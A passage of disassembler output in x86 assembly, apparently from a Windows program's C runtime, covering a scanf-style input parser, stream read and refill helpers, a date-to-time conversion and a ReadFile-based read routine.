dec [ebp+var_C]
test eax, eax
jz short loc_41B9FF
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_4]
push edi
call sub_41C061
mov ebx, eax
pop ecx
cmp ebx, 2Dh
mov [ebp+var_14], ebx
jnz short loc_41B9A6
mov [esi], al
inc esi
jmp short loc_41B9AB
; ---------------------------------------------------------------------------
loc_41B9A6: ; CODE XREF: sub_41B605+39A�j
cmp ebx, 2Bh
jnz short loc_41B9C9
loc_41B9AB: ; CODE XREF: sub_41B605+39F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jnz short loc_41B9BA
and [ebp+var_C], eax
jmp short loc_41B9C9
; ---------------------------------------------------------------------------
loc_41B9BA: ; CODE XREF: sub_41B605+3AE�j
; sub_41B605+3F8�j
inc [ebp+var_4]
push edi
call sub_41C061
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41B9C9: ; CODE XREF: sub_41B605+3A4�j
; sub_41B605+3B3�j
cmp dword_4385FC, 1
jle short loc_41B9DE
push 4
push ebx
call sub_418576
pop ecx
pop ecx
jmp short loc_41B9E9
; ---------------------------------------------------------------------------
loc_41B9DE: ; CODE XREF: sub_41B605+3CB�j
mov eax, off_4383F0
mov al, [eax+ebx*2]
and eax, 4
loc_41B9E9: ; CODE XREF: sub_41B605+3D7�j
test eax, eax
jz short loc_41B9FF
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41B9FF
inc [ebp+var_1C]
mov [esi], bl
inc esi
jmp short loc_41B9BA
; ---------------------------------------------------------------------------
loc_41B9FF: ; CODE XREF: sub_41B605+366�j
; sub_41B605+374�j ...
dec [ebp+var_4]
push edi
push ebx
call sub_41C07B
cmp [ebp+var_1C], 0
pop ecx
pop ecx
jz loc_41C00B
cmp [ebp+var_E], 0
jnz loc_41BF6C
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C4]
push eax
movsx eax, [ebp+var_D]
push [ebp+var_2C]
dec eax
push eax
call off_43A758
add esp, 0Ch
jmp loc_41BF6C
; ---------------------------------------------------------------------------
loc_41BA43: ; CODE XREF: sub_41B605+20C�j
cmp [ebp+var_20], eax
jnz short loc_41BA52
inc [ebp+var_C]
mov [ebp+var_20], 1
loc_41BA52: ; CODE XREF: sub_41B605+441�j
cmp [ebp+var_5], 0
jle short loc_41BA5C
mov [ebp+var_16], 1
loc_41BA5C: ; CODE XREF: sub_41B605+451�j
mov edi, offset dword_43A780
jmp loc_41BB71
; ---------------------------------------------------------------------------
loc_41BA66: ; CODE XREF: sub_41B605+1FD�j
mov eax, esi
sub eax, 70h
jz loc_41BD14
sub eax, 3
jz loc_41BB62
dec eax
dec eax
jz loc_41BD18
sub eax, 3
jz loc_41B84E
sub eax, 3
jz short loc_41BAB4
loc_41BA90: ; CODE XREF: sub_41B605+21B�j
; sub_41B605+22E�j
movzx eax, byte ptr [ebx]
cmp eax, [ebp+var_14]
jnz loc_41BFDB
dec [ebp+var_15]
cmp [ebp+var_E], 0
jnz loc_41BF6C
mov eax, [ebp+var_44]
mov [ebp+arg_8], eax
jmp loc_41BF6C
; ---------------------------------------------------------------------------
loc_41BAB4: ; CODE XREF: sub_41B605+489�j
cmp [ebp+var_5], 0
jle short loc_41BABE
mov [ebp+var_16], 1
loc_41BABE: ; CODE XREF: sub_41B605+4B3�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
cmp byte ptr [edi], 5Eh
jnz loc_41BB75
mov eax, edi
lea edi, [eax+1]
jmp loc_41BB71
; ---------------------------------------------------------------------------
loc_41BAD8: ; CODE XREF: sub_41B605+24F�j
cmp ebx, 2Bh
jnz short loc_41BAFF
loc_41BADD: ; CODE XREF: sub_41B605+259�j
dec [ebp+var_C]
jnz short loc_41BAEE
cmp [ebp+var_20], 0
jz short loc_41BAEE
mov [ebp+var_F], 1
jmp short loc_41BAFF
; ---------------------------------------------------------------------------
loc_41BAEE: ; CODE XREF: sub_41B605+4DB�j
; sub_41B605+4E1�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41C061
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41BAFF: ; CODE XREF: sub_41B605+4D6�j
; sub_41B605+4E7�j
cmp ebx, 30h
jnz loc_41BD4D
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41C061
mov ebx, eax
pop ecx
cmp bl, 78h
mov [ebp+var_14], ebx
jz short loc_41BB4D
cmp bl, 58h
jz short loc_41BB4D
cmp esi, 78h
mov [ebp+var_1C], 1
jz short loc_41BB37
push 6Fh
loc_41BB31: ; CODE XREF: sub_41B605+55B�j
pop esi
jmp loc_41BD4D
; ---------------------------------------------------------------------------
loc_41BB37: ; CODE XREF: sub_41B605+528�j
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41C07B
pop ecx
pop ecx
push 30h
pop ebx
jmp loc_41BD4A
; ---------------------------------------------------------------------------
loc_41BB4D: ; CODE XREF: sub_41B605+517�j
; sub_41B605+51C�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41C061
pop ecx
mov ebx, eax
mov [ebp+var_14], ebx
push 78h
jmp short loc_41BB31
; ---------------------------------------------------------------------------
loc_41BB62: ; CODE XREF: sub_41B605+46F�j
cmp [ebp+var_5], 0
jle short loc_41BB6C
mov [ebp+var_16], 1
loc_41BB6C: ; CODE XREF: sub_41B605+561�j
mov edi, offset dword_43A778
loc_41BB71: ; CODE XREF: sub_41B605+45C�j
; sub_41B605+4CE�j
or [ebp+var_18], 0FFh
loc_41BB75: ; CODE XREF: sub_41B605+4C3�j
push 20h
lea eax, [ebp+var_64]
push 0
push eax
call sub_415390
add esp, 0Ch
cmp [ebp+var_3C], 7Bh
jnz short loc_41BB99
cmp byte ptr [edi], 5Dh
jnz short loc_41BB99
mov dl, 5Dh
inc edi
mov [ebp+var_59], 20h
jmp short loc_41BB9C
; ---------------------------------------------------------------------------
loc_41BB99: ; CODE XREF: sub_41B605+584�j
; sub_41B605+589�j
mov dl, [ebp+var_35]
loc_41BB9C: ; CODE XREF: sub_41B605+592�j
; sub_41B605+5E1�j ...
mov al, [edi]
cmp al, 5Dh
jz short loc_41BC01
inc edi
cmp al, 2Dh
jnz short loc_41BBE8
test dl, dl
jz short loc_41BBE8
mov cl, [edi]
cmp cl, 5Dh
jz short loc_41BBE8
inc edi
cmp dl, cl
jnb short loc_41BBBB
mov al, cl
jmp short loc_41BBBF
; ---------------------------------------------------------------------------
loc_41BBBB: ; CODE XREF: sub_41B605+5B0�j
mov al, dl
mov dl, cl
loc_41BBBF: ; CODE XREF: sub_41B605+5B4�j
cmp dl, al
ja short loc_41BBE4
movzx edx, dl
movzx esi, al
sub esi, edx
inc esi
loc_41BBCC: ; CODE XREF: sub_41B605+5DD�j
mov ecx, edx
mov eax, edx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
inc edx
dec esi
jnz short loc_41BBCC
loc_41BBE4: ; CODE XREF: sub_41B605+5BC�j
xor dl, dl
jmp short loc_41BB9C
; ---------------------------------------------------------------------------
loc_41BBE8: ; CODE XREF: sub_41B605+5A0�j
; sub_41B605+5A4�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
jmp short loc_41BB9C
; ---------------------------------------------------------------------------
loc_41BC01: ; CODE XREF: sub_41B605+59B�j
cmp byte ptr [edi], 0
jz loc_41C00B
cmp [ebp+var_3C], 7Bh
jnz short loc_41BC13
mov [ebp+arg_4], edi
loc_41BC13: ; CODE XREF: sub_41B605+609�j
mov edi, [ebp+arg_0]
mov esi, [ebp+var_2C]
dec [ebp+var_4]
push edi
push [ebp+var_14]
mov [ebp+var_30], esi
call sub_41C07B
pop ecx
pop ecx
loc_41BC2A: ; CODE XREF: sub_41B605+6BC�j
; sub_41B605+6C4�j
cmp [ebp+var_20], 0
jz short loc_41BC3E
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz loc_41BCDA
loc_41BC3E: ; CODE XREF: sub_41B605+629�j
inc [ebp+var_4]
push edi
call sub_41C061
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jz short loc_41BCCE
mov ecx, eax
push 1
and ecx, 7
pop edx
movsx ebx, [ebp+var_18]
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+var_64]
xor ecx, ebx
test edx, ecx
jz short loc_41BCCE
cmp [ebp+var_E], 0
jnz short loc_41BCC6
cmp [ebp+var_16], 0
jz short loc_41BCBB
mov ecx, off_4383F0
mov [ebp+var_38], al
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41BC9A
inc [ebp+var_4]
push edi
call sub_41C061
pop ecx
mov [ebp+var_37], al
loc_41BC9A: ; CODE XREF: sub_41B605+686�j
push dword_4385FC
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_3E]
push eax
call sub_41E869
mov ax, [ebp+var_3E]
add esp, 0Ch
mov [esi], ax
inc esi
inc esi
jmp short loc_41BCBE
; ---------------------------------------------------------------------------
loc_41BCBB: ; CODE XREF: sub_41B605+673�j
mov [esi], al
inc esi
loc_41BCBE: ; CODE XREF: sub_41B605+6B4�j
mov [ebp+var_2C], esi
jmp loc_41BC2A
; ---------------------------------------------------------------------------
loc_41BCC6: ; CODE XREF: sub_41B605+66D�j
inc [ebp+var_30]
jmp loc_41BC2A
; ---------------------------------------------------------------------------
loc_41BCCE: ; CODE XREF: sub_41B605+649�j
; sub_41B605+667�j
dec [ebp+var_4]
push edi
push eax
call sub_41C07B
pop ecx
pop ecx
loc_41BCDA: ; CODE XREF: sub_41B605+633�j
cmp [ebp+var_30], esi
jz loc_41C00B
cmp [ebp+var_E], 0
jnz loc_41BF6C
inc [ebp+var_34]
cmp [ebp+var_3C], 63h
jz loc_41BF6C
cmp [ebp+var_16], 0
mov eax, [ebp+var_2C]
jz short loc_41BD0C
and word ptr [eax], 0
jmp loc_41BF6C
; ---------------------------------------------------------------------------
loc_41BD0C: ; CODE XREF: sub_41B605+6FC�j
and byte ptr [eax], 0
jmp loc_41BF6C
; ---------------------------------------------------------------------------
loc_41BD14: ; CODE XREF: sub_41B605+466�j
mov [ebp+var_D], 1
loc_41BD18: ; CODE XREF: sub_41B605+203�j
; sub_41B605+215�j ...
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz short loc_41BD26
mov [ebp+var_17], 1
jmp short loc_41BD2B
; ---------------------------------------------------------------------------
loc_41BD26: ; CODE XREF: sub_41B605+719�j
cmp ebx, 2Bh
jnz short loc_41BD4D
loc_41BD2B: ; CODE XREF: sub_41B605+71F�j
dec [ebp+var_C]
jnz short loc_41BD3C
cmp [ebp+var_20], 0
jz short loc_41BD3C
mov [ebp+var_F], 1
jmp short loc_41BD4D
; ---------------------------------------------------------------------------
loc_41BD3C: ; CODE XREF: sub_41B605+729�j
; sub_41B605+72F�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41C061
pop ecx
mov ebx, eax
loc_41BD4A: ; CODE XREF: sub_41B605+543�j
mov [ebp+var_14], ebx
loc_41BD4D: ; CODE XREF: sub_41B605+4FD�j
; sub_41B605+52D�j ...
cmp [ebp+var_30], 0
jz loc_41BE66
cmp [ebp+var_F], 0
jnz loc_41BE44
loc_41BD61: ; CODE XREF: sub_41B605+82C�j
cmp esi, 78h
jnz short loc_41BDB5
cmp dword_4385FC, 1
jle short loc_41BD7E
push 80h
push ebx
call sub_418576
pop ecx
pop ecx
jmp short loc_41BD8B
; ---------------------------------------------------------------------------
loc_41BD7E: ; CODE XREF: sub_41B605+768�j
mov eax, off_4383F0
mov al, [eax+ebx*2]
and eax, 80h
loc_41BD8B: ; CODE XREF: sub_41B605+777�j
test eax, eax
jz loc_41BE36
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 4
pop ecx
call sub_41E960
push ebx
mov [ebp+var_28], eax
mov [ebp+var_24], edx
call sub_41C02A
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41BE08
; ---------------------------------------------------------------------------
loc_41BDB5: ; CODE XREF: sub_41B605+75F�j
cmp dword_4385FC, 1
jle short loc_41BDCA
push 4
push ebx
call sub_418576
pop ecx
pop ecx
jmp short loc_41BDD5
; ---------------------------------------------------------------------------
loc_41BDCA: ; CODE XREF: sub_41B605+7B7�j
mov eax, off_4383F0
mov al, [eax+ebx*2]
and eax, 4
loc_41BDD5: ; CODE XREF: sub_41B605+7C3�j
test eax, eax
jz short loc_41BE36
cmp esi, 6Fh
jnz short loc_41BDF3
cmp ebx, 38h
jge short loc_41BE36
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 3
pop ecx
call sub_41E960
jmp short loc_41BE02
; ---------------------------------------------------------------------------
loc_41BDF3: ; CODE XREF: sub_41B605+7D7�j
push 0
push 0Ah
push [ebp+var_24]
push [ebp+var_28]
call sub_4157C0
loc_41BE02: ; CODE XREF: sub_41B605+7EC�j
mov [ebp+var_28], eax
mov [ebp+var_24], edx
loc_41BE08: ; CODE XREF: sub_41B605+7AE�j
inc [ebp+var_1C]
lea eax, [ebx-30h]
cdq
add [ebp+var_28], eax
adc [ebp+var_24], edx
cmp [ebp+var_20], 0
jz short loc_41BE20
dec [ebp+var_C]
jz short loc_41BE44
loc_41BE20: ; CODE XREF: sub_41B605+814�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41C061
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_41BD61
; ---------------------------------------------------------------------------
loc_41BE36: ; CODE XREF: sub_41B605+788�j
; sub_41B605+7D2�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41C07B
pop ecx
pop ecx
loc_41BE44: ; CODE XREF: sub_41B605+756�j
; sub_41B605+819�j
cmp [ebp+var_17], 0
jz loc_41BF2A
mov eax, [ebp+var_28]
mov ecx, [ebp+var_24]
neg eax
adc ecx, 0
mov [ebp+var_28], eax
neg ecx
mov [ebp+var_24], ecx
jmp loc_41BF2A
; ---------------------------------------------------------------------------
loc_41BE66: ; CODE XREF: sub_41B605+74C�j
cmp [ebp+var_F], 0
jnz loc_41BF22
loc_41BE70: ; CODE XREF: sub_41B605+90A�j
cmp esi, 78h
jz short loc_41BEB4
cmp esi, 70h
jz short loc_41BEB4
cmp dword_4385FC, 1
jle short loc_41BE8F
push 4
push ebx
call sub_418576
pop ecx
pop ecx
jmp short loc_41BE9A
; ---------------------------------------------------------------------------
loc_41BE8F: ; CODE XREF: sub_41B605+87C�j
mov eax, off_4383F0
mov al, [eax+ebx*2]
and eax, 4
loc_41BE9A: ; CODE XREF: sub_41B605+888�j
test eax, eax
jz short loc_41BF14
cmp esi, 6Fh
jnz short loc_41BEAD
cmp ebx, 38h
jge short loc_41BF14
shl edi, 3
jmp short loc_41BEEC
; ---------------------------------------------------------------------------
loc_41BEAD: ; CODE XREF: sub_41B605+89C�j
lea edi, [edi+edi*4]
shl edi, 1
jmp short loc_41BEEC
; ---------------------------------------------------------------------------
loc_41BEB4: ; CODE XREF: sub_41B605+86E�j
; sub_41B605+873�j
cmp dword_4385FC, 1
jle short loc_41BECC
push 80h
push ebx
call sub_418576
pop ecx
pop ecx
jmp short loc_41BED9
; ---------------------------------------------------------------------------
loc_41BECC: ; CODE XREF: sub_41B605+8B6�j
mov eax, off_4383F0
mov al, [eax+ebx*2]
and eax, 80h
loc_41BED9: ; CODE XREF: sub_41B605+8C5�j
test eax, eax
jz short loc_41BF14
push ebx
shl edi, 4
call sub_41C02A
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41BEEC: ; CODE XREF: sub_41B605+8A6�j
; sub_41B605+8AD�j
inc [ebp+var_1C]
cmp [ebp+var_20], 0
lea edi, [edi+ebx-30h]
jz short loc_41BEFE
dec [ebp+var_C]
jz short loc_41BF22
loc_41BEFE: ; CODE XREF: sub_41B605+8F2�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41C061
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_41BE70
; ---------------------------------------------------------------------------
loc_41BF14: ; CODE XREF: sub_41B605+897�j
; sub_41B605+8A1�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41C07B
pop ecx
pop ecx
loc_41BF22: ; CODE XREF: sub_41B605+865�j
; sub_41B605+8F7�j
cmp [ebp+var_17], 0
jz short loc_41BF2A
neg edi
loc_41BF2A: ; CODE XREF: sub_41B605+843�j
; sub_41B605+85C�j ...
cmp esi, 46h
jnz short loc_41BF33
and [ebp+var_1C], 0
loc_41BF33: ; CODE XREF: sub_41B605+928�j
cmp [ebp+var_1C], 0
jz loc_41C00B
cmp [ebp+var_E], 0
jnz short loc_41BF6C
inc [ebp+var_34]
loc_41BF46: ; CODE XREF: sub_41B605+23B�j
cmp [ebp+var_30], 0
jz short loc_41BF5C
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov ecx, [ebp+var_24]
mov [eax+4], ecx
jmp short loc_41BF6C
; ---------------------------------------------------------------------------
loc_41BF5C: ; CODE XREF: sub_41B605+945�j
cmp [ebp+var_D], 0
mov eax, [ebp+var_2C]
jz short loc_41BF69
mov [eax], edi
jmp short loc_41BF6C
; ---------------------------------------------------------------------------
loc_41BF69: ; CODE XREF: sub_41B605+95E�j
mov [eax], di
loc_41BF6C: ; CODE XREF: sub_41B605+241�j
; sub_41B605+414�j ...
inc [ebp+var_15]
inc [ebp+arg_4]
mov esi, [ebp+arg_4]
jmp short loc_41BFB9
; ---------------------------------------------------------------------------
loc_41BF77: ; CODE XREF: sub_41B605+93�j
inc [ebp+var_4]
push edi
call sub_41C061
mov ebx, eax
pop ecx
movzx eax, byte ptr [esi]
inc esi
cmp eax, ebx
mov [ebp+var_14], ebx
mov [ebp+arg_4], esi
jnz short loc_41BFE6
mov ecx, off_4383F0
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41BFB9
inc [ebp+var_4]
push edi
call sub_41C061
pop ecx
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, eax
mov [ebp+arg_4], esi
jnz short loc_41BFF4
dec [ebp+var_4]
loc_41BFB9: ; CODE XREF: sub_41B605+970�j
; sub_41B605+99A�j
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_41BFCF
cmp byte ptr [esi], 25h
jnz short loc_41C011
mov eax, [ebp+arg_4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_41C011
mov esi, eax
loc_41BFCF: ; CODE XREF: sub_41B605+9B8�j
mov al, [esi]
test al, al
jnz loc_41B62F
jmp short loc_41C00B
; ---------------------------------------------------------------------------
loc_41BFDB: ; CODE XREF: sub_41B605+1F4�j
; sub_41B605+491�j
push [ebp+arg_0]
dec [ebp+var_4]
push [ebp+var_14]
jmp short loc_41BFEB
; ---------------------------------------------------------------------------
loc_41BFE6: ; CODE XREF: sub_41B605+98A�j
dec [ebp+var_4]
push edi
push ebx
loc_41BFEB: ; CODE XREF: sub_41B605+9DF�j
call sub_41C07B
pop ecx
pop ecx
jmp short loc_41C00B
; ---------------------------------------------------------------------------
loc_41BFF4: ; CODE XREF: sub_41B605+9AF�j
dec [ebp+var_4]
push edi
push eax
call sub_41C07B
dec [ebp+var_4]
push edi
push ebx
call sub_41C07B
add esp, 10h
loc_41C00B: ; CODE XREF: sub_41B605+1F�j
; sub_41B605+40A�j ...
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_41C022
loc_41C011: ; CODE XREF: sub_41B605+9BD�j
; sub_41B605+9C6�j
mov eax, [ebp+var_34]
test eax, eax
jnz short loc_41C025
cmp [ebp+var_15], al
jnz short loc_41C025
or eax, 0FFFFFFFFh
jmp short loc_41C025
; ---------------------------------------------------------------------------
loc_41C022: ; CODE XREF: sub_41B605+A0A�j
mov eax, [ebp+var_34]
loc_41C025: ; CODE XREF: sub_41B605+A11�j
; sub_41B605+A16�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41B605 endp
; =============== S U B R O U T I N E =======================================
sub_41C02A proc near ; CODE XREF: sub_41B605+7A3�p
; sub_41B605+8DC�p
arg_0 = dword ptr 4
cmp dword_4385FC, 1
push esi
jle short loc_41C044
mov esi, [esp+4+arg_0]
push 4
push esi
call sub_418576
pop ecx
pop ecx
jmp short loc_41C053
; ---------------------------------------------------------------------------
loc_41C044: ; CODE XREF: sub_41C02A+8�j
mov esi, [esp+4+arg_0]
mov eax, off_4383F0
mov al, [eax+esi*2]
and eax, 4
loc_41C053: ; CODE XREF: sub_41C02A+18�j
test eax, eax
jnz short loc_41C05D
and esi, 0FFFFFFDFh
sub esi, 7
loc_41C05D: ; CODE XREF: sub_41C02A+2B�j
mov eax, esi
pop esi
retn
sub_41C02A endp
; =============== S U B R O U T I N E =======================================
sub_41C061 proc near ; CODE XREF: sub_41B605+1E1�p
; sub_41B605+289�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
dec dword ptr [edx+4]
js short loc_41C073
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_41C073: ; CODE XREF: sub_41C061+7�j
push edx
call sub_41C178
pop ecx
retn
sub_41C061 endp
; =============== S U B R O U T I N E =======================================
sub_41C07B proc near ; CODE XREF: sub_41B605+6B�p
; sub_41B605+3FF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFFFh
jz short locret_41C091
push [esp+arg_4]
push [esp+4+arg_0]
call sub_41E97F
pop ecx
pop ecx
locret_41C091: ; CODE XREF: sub_41C07B+5�j
retn
sub_41C07B endp
; =============== S U B R O U T I N E =======================================
sub_41C092 proc near ; CODE XREF: sub_41B605+63�p
; sub_41B605+1D3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
loc_41C098: ; CODE XREF: sub_41C092+1D�j
push [esp+8+arg_4]
inc dword ptr [esi]
call sub_41C061
mov edi, eax
push edi
call sub_41E931
pop ecx
test eax, eax
pop ecx
jnz short loc_41C098
mov eax, edi
pop edi
pop esi
retn
sub_41C092 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C0B6 proc near ; CODE XREF: sub_41697B+C9�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
sub ebx, 76Ch
cmp ebx, 46h
jl loc_41C172
cmp ebx, 8Ah
jg loc_41C172
push esi
push edi
mov edi, [ebp+arg_4]
mov esi, dword_43AEA4[edi*4]
add esi, [ebp+arg_8]
test bl, 3
jnz short loc_41C0F5
cmp edi, 2
jle short loc_41C0F5
inc esi
loc_41C0F5: ; CODE XREF: sub_41C0B6+37�j
; sub_41C0B6+3C�j
call sub_41E9ED
mov eax, ebx
lea ecx, [ebx-1]
imul eax, 16Dh
sar ecx, 2
mov edx, esi
mov [ebp+var_8], esi
add edx, ecx
mov [ebp+var_10], ebx
add eax, edx
mov edx, [ebp+arg_14]
lea ecx, [eax+eax*2]
mov eax, [ebp+arg_C]
mov [ebp+var_1C], eax
lea ecx, [eax+ecx*8]
imul ecx, 3Ch
add ecx, [ebp+arg_10]
imul ecx, 3Ch
add ecx, dword_43ADC0
dec edi
cmp [ebp+arg_18], 1
mov [ebp+var_14], edi
pop edi
pop esi
lea ecx, [ecx+edx+7C558180h]
mov [ebp+arg_0], ecx
jz short loc_41C168
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_41C16E
cmp dword_43ADC4, 0
jz short loc_41C16E
lea eax, [ebp+var_24]
push eax
call sub_41EC60
pop ecx
mov ecx, [ebp+arg_0]
test eax, eax
jz short loc_41C16E
loc_41C168: ; CODE XREF: sub_41C0B6+90�j
add ecx, dword_43ADC8
loc_41C16E: ; CODE XREF: sub_41C0B6+96�j
; sub_41C0B6+9F�j ...
mov eax, ecx
jmp short loc_41C175
; ---------------------------------------------------------------------------
loc_41C172: ; CODE XREF: sub_41C0B6+13�j
; sub_41C0B6+1F�j
or eax, 0FFFFFFFFh
loc_41C175: ; CODE XREF: sub_41C0B6+BA�j
pop ebx
leave
retn
sub_41C0B6 endp
; =============== S U B R O U T I N E =======================================
sub_41C178 proc near ; CODE XREF: sub_416A57+A9�p
; sub_416FDC+2D�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_41C24C
test al, 40h
jnz loc_41C24C
test al, 2
jz short loc_41C19E
or al, 20h
mov [esi+0Ch], eax
jmp loc_41C24C
; ---------------------------------------------------------------------------
loc_41C19E: ; CODE XREF: sub_41C178+1A�j
or al, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41C1B2
push esi
call sub_41D908
pop ecx
jmp short loc_41C1B7
; ---------------------------------------------------------------------------
loc_41C1B2: ; CODE XREF: sub_41C178+2F�j
mov eax, [esi+8]
mov [esi], eax
loc_41C1B7: ; CODE XREF: sub_41C178+38�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_41C251
add esp, 0Ch
mov [esi+4], eax
test eax, eax
jz short loc_41C23B
cmp eax, 0FFFFFFFFh
jz short loc_41C23B
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_41C210
mov ecx, [esi+10h]
push edi
cmp ecx, 0FFFFFFFFh
jz short loc_41C1F9
mov edi, ecx
sar edi, 5
and ecx, 1Fh
mov edi, dword_46CE20[edi*4]
lea edi, [edi+ecx*8]
jmp short loc_41C1FE
; ---------------------------------------------------------------------------
loc_41C1F9: ; CODE XREF: sub_41C178+6B�j
mov edi, offset dword_43AA70
loc_41C1FE: ; CODE XREF: sub_41C178+7F�j
mov cl, [edi+4]
pop edi
and cl, 82h
cmp cl, 82h
jnz short loc_41C210
or dh, 20h
mov [esi+0Ch], edx
loc_41C210: ; CODE XREF: sub_41C178+62�j
; sub_41C178+90�j
cmp dword ptr [esi+18h], 200h
jnz short loc_41C22D
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_41C22D
test ch, 4
jnz short loc_41C22D
mov dword ptr [esi+18h], 1000h
loc_41C22D: ; CODE XREF: sub_41C178+9F�j
; sub_41C178+A7�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C23B: ; CODE XREF: sub_41C178+55�j
; sub_41C178+5A�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_41C24C: ; CODE XREF: sub_41C178+A�j
; sub_41C178+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_41C178 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C251 proc near ; CODE XREF: sub_416A57+90�p
; sub_41C178+48�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
cmp esi, dword_46CF20
jnb loc_41C42E
mov eax, esi
and esi, 1Fh
sar eax, 5
shl esi, 3
lea ebx, ds:46CE20h[eax*4]
mov eax, dword_46CE20[eax*4]
add eax, esi
mov dl, [eax+4]
test dl, 1
jz loc_41C42E
and [ebp+var_8], 0
mov edi, [ebp+arg_4]
cmp [ebp+arg_8], 0
mov ecx, edi
jz short loc_41C306
test dl, 2
jnz short loc_41C306
test dl, 48h
jz short loc_41C2C6
mov al, [eax+5]
cmp al, 0Ah
jz short loc_41C2C6
dec [ebp+arg_8]
mov [edi], al
mov eax, [ebx]
lea ecx, [edi+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_41C2C6: ; CODE XREF: sub_41C251+56�j
; sub_41C251+5D�j
lea eax, [ebp+var_C]
push 0
push eax
mov eax, [ebx]
push [ebp+arg_8]
push ecx
push dword ptr [eax+esi]
call dword_421068 ; ReadFile
test eax, eax
jnz short loc_41C319
call dword_421088 ; RtlGetLastWin32Error
push 5
pop ecx
cmp eax, ecx
jnz short loc_41C301
mov dword_46BB04, 9
mov dword_46BB08, ecx
jmp loc_41C43F
; ---------------------------------------------------------------------------
loc_41C301: ; CODE XREF: sub_41C251+99�j
cmp eax, 6Dh
jnz short loc_41C30D
loc_41C306: ; CODE XREF: sub_41C251+4C�j
; sub_41C251+51�j
xor eax, eax
jmp loc_41C442
; ---------------------------------------------------------------------------
loc_41C30D: ; CODE XREF: sub_41C251+B3�j
push eax
call sub_41CE74
pop ecx
jmp loc_41C43F
; ---------------------------------------------------------------------------
loc_41C319: ; CODE XREF: sub_41C251+8C�j
mov eax, [ebx]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [eax+esi+4]
test al, 80h
jz loc_41C429
test edx, edx
jz short loc_41C33E
cmp byte ptr [edi], 0Ah
jnz short loc_41C33E
or al, 4
jmp short loc_41C340
; ---------------------------------------------------------------------------
loc_41C33E: ; CODE XREF: sub_41C251+E2�j
; sub_41C251+E7�j
